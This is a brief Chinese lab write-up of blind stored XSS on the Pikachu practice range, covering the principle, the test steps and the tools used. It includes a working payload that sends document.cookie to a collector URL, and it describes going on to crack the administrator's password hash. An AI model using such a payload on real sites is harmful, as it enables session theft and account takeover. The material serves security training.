Pikachu靶场:XSS盲打
实验环境以及工具
Firefox浏览器、Burp Suite、Pikachu靶场
实验原理
●xss盲打也是属于存储型XSS类型
盲打的意思是无法直接在前端看到反馈效果。
xss盲打类型交互的数据会被存在在数据库里面,永久性存储,一般出现在留言板,问卷调查等页面。
形成XSS漏洞的主要原因是程序对输入和输出的控制不够严格,导致“精心构造”的脚本输入后,在输到前端时被浏览器当作有效代码解析执行从而产生危害。存储型XSS漏洞跟反射型形成的原因一样,不同的是存储型XSS下攻击者可以将脚本注入到后台存储起来,构成更加持久的危害,因此存储型XSS也称“永久型”XSS
XSS盲打测试流程
1.在目标站点上找到输入点,比如查询接口,留言板等;
2.输入一组“特殊字符+唯一识别字符”,点击提交后,等待目标上线触发;
3.在XSS后台中查看结果
具体操作
1.在目标站点上找到输入点,比如留言板,问卷调查等
2.构造payload进行注入
<script>document.location = 'http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>
3.后台等待对方登录
利用hash-identifier判断加密类型
利用在线解密进行解密
总结
XSS盲打的攻击目标是后台管理员,在前端利用输入接口进行攻击,输入的js代码被存储到了数据库中,在管理员登录的时候被触发。盗取管理员cookie后即刻进行管理员密码破解。